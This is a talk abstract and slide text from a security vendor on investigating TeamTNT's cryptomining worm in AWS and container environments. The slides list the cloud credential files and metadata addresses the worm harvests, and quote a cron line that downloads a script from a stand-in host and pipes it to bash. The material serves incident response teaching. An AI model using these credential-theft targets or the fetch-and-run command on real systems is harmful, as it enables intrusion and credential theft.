The talk "Case Studies TeamTNT - AWS & Container Cryptomining Worm DFIR" goes into the incident response investigation into a container cryptomining worm attack perpetrated by the hacking group TeamTNT. The presentation will focus on the use of AWS and container technology in the attack and how these tools were leveraged in the investigation. Attendees will learn about the tools and techniques used to identify and contain the attack, as well as lessons learned from the incident response. The presentation will cover the importance of monitoring container environments for security threats and implementing best practices for AWS security. Additionally the talk will highlight the use of machine learning and automation in the incident response process. By the end of the presentation, attendees will gain a better understanding of the challenges and opportunities of conducting DFIR investigations in cloud environments and with container technology.

1. Case Studies
TeamTNT - AWS & Container
Cryptomining Worm DFIR
Cado Security | 1

2. Kubernetes Honeypot
Cloud Environment
Kubernetes Cluster
Node
Node
Node

3. Exposed Docker &
Kubernetes APIs
(Simplified, excludes e.g. SSH exploitation, Redis exploitation etc.)
Attacker
Victim System
Running docker on 2375
Or Kubernetes on 10250
List of External IP
Addresses to Exploit
from C&C Server
Local IP Addresses
Victim System
Running docker on 2375
Or Kubernetes on 10250
scanning scanning

4. AWS Key Theft? Interesting!

5. Improved AWS Cred Theft
● /proc/*/env
● docker ps -q
● /root/.aws/credentials

6. AWS MetaData URL Cred Theft
● 169.254.169.254
● /iam/security/credentials
● 169.254.170.2 - EKS!

7. GCP Support
.config/gcloud/access_tokens.db

8. Key Theft

9. Key Theft - Their Server

10. Pivoting via Timestamp
Starting with a malicious event and searching for events surrounding it can make
investigations easier. In this case, let’s start our investigation by pivoting from the moment
xmrig was installed on the system:

11. Pivoting via File Location
As part of your investigation, it’s important to check for other files that reside in the same folder as
any malicious files detected. For example, with the file above, we can see a number of
suspicious files in the same folder:

12. Pivoting via Monero Wallet ID
You can normally find the Monero wallet ID in the config.json file that xmrig uses to mine:

13. Review the bash_history of any users on the system. You will only see bash history for
users that have executed interactive commands, so these are normally worth reviewing:
Bash History

14. Looking for Persistence and
Backdoors
Mining malware is typically installed via a Bash script post-exploitation. Mining malware
will also install permanently through cronjobs, with a command such as:
* * * * curl -s http://badsite[.]org/logo.jpg | bash -s
This downloads a bash script to re-install the malware, and executes it via bash.
You can check for cronjobs under /etc/crontab/ and /var/spool/cron/
You can also check /var/log/syslog for executed cron files, for example:
**Dec 24 02:10:01 node23 CRON[5283]: (root) CMD ( /usr/sbin/monero)**

15. Cado Response
Free 14-day trial
Receive unlimited access to
the Cado Response Platform
for 14 days.
www.cadosecurity.com/free-investigation/